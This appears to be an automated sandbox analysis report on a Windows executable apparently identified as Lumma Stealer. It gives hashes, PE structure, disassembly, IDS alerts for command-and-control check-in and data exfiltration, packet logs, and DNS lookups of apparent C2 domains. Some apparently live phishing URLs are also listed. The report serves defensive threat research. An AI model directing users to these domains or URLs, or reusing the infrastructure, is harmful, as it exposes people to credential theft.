	file.exe	Get hash	malicious	Unknown	Browse	104.21.7.169

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	fbot.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	8.44.60.26
	6wjCYfcM3a.exe	Get hash	malicious	LummaC	Browse	172.67.160.80
	https://shorturl.at/ZbKEL?REVd=Vhx6ZLBnjMm	Get hash	malicious	Unknown	Browse	104.26.8.129
	https://avidgroup.famislnc.com/fvcvfxfec/cc6d843dfd/?1f9da=amtsZW1wQGNhcmlzbHMuY29t	Get hash	malicious	Unknown	Browse	172.67.69.226
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, DarkTortilla, LummaC Stealer, Stealc, Vidar	Browse	104.21.7.169
	file.exe	Get hash	malicious	Unknown	Browse	104.21.7.169
	file.exe	Get hash	malicious	Unknown	Browse	172.67.187.240
	https://Saic.anastaclooverseas.com/zwfgemvfcbcitui/xivyvjldaquzs/Zgktmgjdfgpirwe89g0xmaersk/ixiswwcbzmfgee/jebqtppyunp/random.bby/inpoxqhfiww/gmail.com/ozwunijponqp8	Get hash	malicious	Unknown	Browse	104.21.71.35
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	172.67.187.240
	Fumari INC.eml	Get hash	malicious	Unknown	Browse	104.18.11.200

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	6wjCYfcM3a.exe	Get hash	malicious	LummaC	Browse	172.67.187.240
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, DarkTortilla, LummaC Stealer, Stealc, Vidar	Browse	172.67.187.240
	file.exe	Get hash	malicious	Unknown	Browse	172.67.187.240
	file.exe	Get hash	malicious	Unknown	Browse	172.67.187.240
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	172.67.187.240
	file.exe	Get hash	malicious	Unknown	Browse	172.67.187.240
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.187.240
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.187.240
	file.exe	Get hash	malicious	Unknown	Browse	172.67.187.240

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.949430914120699
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'870'848 bytes
MD5:	ae35cd7c9be6be3a150f903ddd1e411d
SHA1:	8ed830ee8e571e05afb58dd8755936eba832b72b
SHA256:	8be6a98bd5d89cf4adc715b3f0cd7914a47812086c13098f8bdb3fda1094b812
SHA512:	f93f3d4da6017b4e3c7bb04c973c4237deb81dc4164ff494a833f6f6403b66b90476fef5d52dc2a46b1b82a3e45bb07e970df139c08e2dcf5f7294d87f35e6f2
SSDEEP:	49152:FjfZF5Y4uwFvSxHj41aiPEjFQx4AEVfqGf:FjfZ7RvS53JiE5qg
TLSH:	3E85335F1E511327C701037BD7E7C8A6FE72C16A08568B811E43A77AE78EB199EB08D1
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Dg..............................J...........@...........................K......j....@.................................\...p..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8ad000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67449FF1 [Mon Nov 25 16:04:01 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F29FCDECFCAh
punpckhdq mm3, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F29FCDEEFC5h
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx+00000080h], dh
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
sbb al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebp+01h], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5805c	0x70	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x57000	0x2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x581f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x56000	0x25a00	34f8b40b824360e75f21c245a01417c5	False	1.0003633720930232	data	7.977158062158779	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x57000	0x2b0	0x200	addeda20fdd56323814e9abd658ff965	False	0.802734375	data	6.001632748653599	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x58000	0x1000	0x200	c92ced077364b300efd06b14c70a61dc	False	0.15625	data	1.1194718105633323	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x59000	0x2b3000	0x200	3765249e3a13720683193a0ec5d9d160	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
yjzienyf	0x30c000	0x1a0000	0x19f400	1472a09e67f79240ba11309b01c7dc07	False	0.9945862808549066	data	7.9544746037347664	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xccchzgg	0x4ac000	0x1000	0x600	81f72e3d056fa9052ed409706d8b61dc	False	0.59765625	data	5.160811326530273	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4ad000	0x3000	0x2200	02ce643a48165d2d0a67346161198aef	False	0.068359375	DOS executable (COM)	0.7486193393748266	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4ab004	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-25T23:34:09.636137+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49700	172.67.187.240	443	TCP
2024-11-25T23:34:10.370759+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49700	172.67.187.240	443	TCP
2024-11-25T23:34:10.370759+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49700	172.67.187.240	443	TCP
2024-11-25T23:34:11.893067+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49701	172.67.187.240	443	TCP
2024-11-25T23:34:12.995666+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.7	49701	172.67.187.240	443	TCP
2024-11-25T23:34:12.995666+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49701	172.67.187.240	443	TCP
2024-11-25T23:34:14.795009+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49703	172.67.187.240	443	TCP
2024-11-25T23:34:15.807677+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.7	49703	172.67.187.240	443	TCP
2024-11-25T23:34:17.179431+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49709	172.67.187.240	443	TCP
2024-11-25T23:34:19.586552+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49715	172.67.187.240	443	TCP
2024-11-25T23:34:22.211547+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49721	172.67.187.240	443	TCP
2024-11-25T23:34:25.491950+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49729	172.67.187.240	443	TCP
2024-11-25T23:34:25.496812+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.7	49729	172.67.187.240	443	TCP
2024-11-25T23:34:31.320567+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49748	172.67.187.240	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 23:34:08.365461111 CET	49700	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:08.365489006 CET	443	49700	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:08.365571022 CET	49700	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:08.368959904 CET	49700	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:08.368974924 CET	443	49700	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:09.636059046 CET	443	49700	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:09.636137009 CET	49700	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:09.639157057 CET	49700	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:09.639162064 CET	443	49700	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:09.639460087 CET	443	49700	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:09.684669018 CET	49700	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:09.697870016 CET	49700	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:09.697897911 CET	49700	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:09.697984934 CET	443	49700	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:10.370779037 CET	443	49700	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:10.370872021 CET	443	49700	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:10.370954037 CET	49700	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:10.385020018 CET	49700	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:10.385020018 CET	49700	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:10.385049105 CET	443	49700	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:10.385059118 CET	443	49700	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:10.680180073 CET	49701	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:10.680226088 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:10.680319071 CET	49701	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:10.680861950 CET	49701	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:10.680871964 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:11.893002033 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:11.893066883 CET	49701	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:11.894723892 CET	49701	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:11.894735098 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:11.894996881 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:11.896347046 CET	49701	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:11.896394014 CET	49701	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:11.896411896 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:12.995676994 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:12.995728970 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:12.995779037 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:12.995798111 CET	49701	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:12.995815039 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:12.995826006 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:12.995863914 CET	49701	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:12.995877981 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:12.995918989 CET	49701	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:12.998238087 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:13.006808996 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:13.006843090 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:13.007044077 CET	49701	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:13.007056952 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:13.007110119 CET	49701	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:13.015192032 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:13.059699059 CET	49701	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:13.115437984 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:13.169198990 CET	49701	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:13.187952995 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:13.191806078 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:13.191909075 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:13.191982031 CET	49701	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:13.204288960 CET	49701	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:13.204307079 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:13.204323053 CET	49701	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:13.204329014 CET	443	49701	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:13.530469894 CET	49703	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:13.530513048 CET	443	49703	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:13.530586958 CET	49703	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:13.531141996 CET	49703	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:13.531155109 CET	443	49703	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:14.793823957 CET	443	49703	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:14.795008898 CET	49703	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:14.795373917 CET	49703	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:14.795380116 CET	443	49703	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:14.795619965 CET	443	49703	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:14.797091961 CET	49703	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:14.797091961 CET	49703	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:14.797130108 CET	443	49703	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:15.807713985 CET	443	49703	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:15.807818890 CET	443	49703	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:15.807864904 CET	49703	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:15.808033943 CET	49703	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:15.808051109 CET	443	49703	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:15.916955948 CET	49709	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:15.916994095 CET	443	49709	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:15.917068005 CET	49709	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:15.917325974 CET	49709	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:15.917354107 CET	443	49709	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:17.179322004 CET	443	49709	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:17.179430962 CET	49709	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:17.180804014 CET	49709	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:17.180823088 CET	443	49709	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:17.181251049 CET	443	49709	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:17.182526112 CET	49709	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:17.182729006 CET	49709	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:17.182780981 CET	443	49709	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:17.182843924 CET	49709	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:17.223335028 CET	443	49709	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:18.154999018 CET	443	49709	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:18.155092001 CET	443	49709	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:18.155148029 CET	49709	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:18.155410051 CET	49709	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:18.155441999 CET	443	49709	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:18.327245951 CET	49715	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:18.327271938 CET	443	49715	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:18.327357054 CET	49715	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:18.327692986 CET	49715	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:18.327709913 CET	443	49715	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:19.586287022 CET	443	49715	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:19.586551905 CET	49715	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:19.587898970 CET	49715	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:19.587905884 CET	443	49715	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:19.588232994 CET	443	49715	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:19.589665890 CET	49715	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:19.589807987 CET	49715	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:19.589843988 CET	443	49715	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:19.589922905 CET	49715	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:19.589932919 CET	443	49715	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:20.487044096 CET	443	49715	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:20.487149954 CET	443	49715	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:20.487273932 CET	49715	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:20.496277094 CET	49715	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:20.496284962 CET	443	49715	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:20.947945118 CET	49721	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:20.947963953 CET	443	49721	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:20.948033094 CET	49721	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:20.948329926 CET	49721	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:20.948343039 CET	443	49721	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:22.211309910 CET	443	49721	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:22.211546898 CET	49721	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:22.213485956 CET	49721	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:22.213493109 CET	443	49721	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:22.213736057 CET	443	49721	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:22.215334892 CET	49721	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:22.215513945 CET	49721	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:22.215519905 CET	443	49721	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:23.696320057 CET	443	49721	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:23.696449041 CET	443	49721	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:23.696522951 CET	49721	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:23.696749926 CET	49721	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:23.696768999 CET	443	49721	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:24.149725914 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:24.149766922 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:24.149847984 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:24.150343895 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:24.150356054 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:25.491868973 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:25.491950035 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:25.493587017 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:25.493597031 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:25.493819952 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:25.495004892 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:25.496404886 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:25.496434927 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:25.496562004 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:25.496591091 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:25.496709108 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:25.496750116 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:25.496901989 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:25.496929884 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:25.497072935 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:25.497104883 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:25.497348070 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:25.497375965 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:25.497386932 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:25.497399092 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:25.497524977 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:25.497550964 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:25.497570992 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:25.497757912 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:25.497792006 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:25.543332100 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:25.543518066 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:25.543557882 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:25.543580055 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:25.543602943 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:25.543628931 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:25.543643951 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:30.336365938 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:30.336460114 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:30.336532116 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:30.336616039 CET	49729	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:30.336633921 CET	443	49729	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:30.347784042 CET	49748	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:30.347815990 CET	443	49748	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:30.347898960 CET	49748	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:30.348187923 CET	49748	443	192.168.2.7	172.67.187.240
Nov 25, 2024 23:34:30.348195076 CET	443	49748	172.67.187.240	192.168.2.7
Nov 25, 2024 23:34:31.320566893 CET	49748	443	192.168.2.7	172.67.187.240

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 23:34:07.314604044 CET	50940	53	192.168.2.7	1.1.1.1
Nov 25, 2024 23:34:07.547818899 CET	53	50940	1.1.1.1	192.168.2.7
Nov 25, 2024 23:34:07.608978033 CET	50496	53	192.168.2.7	1.1.1.1
Nov 25, 2024 23:34:08.036232948 CET	53	50496	1.1.1.1	192.168.2.7
Nov 25, 2024 23:34:08.048291922 CET	51705	53	192.168.2.7	1.1.1.1
Nov 25, 2024 23:34:08.358052969 CET	53	51705	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 25, 2024 23:34:07.314604044 CET	192.168.2.7	1.1.1.1	0x1acb	Standard query (0)	property-imper.sbs	A (IP address)	IN (0x0001)	false
Nov 25, 2024 23:34:07.608978033 CET	192.168.2.7	1.1.1.1	0x6a19	Standard query (0)	frogs-severz.sbs	A (IP address)	IN (0x0001)	false
Nov 25, 2024 23:34:08.048291922 CET	192.168.2.7	1.1.1.1	0x1145	Standard query (0)	occupy-blushi.sbs	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
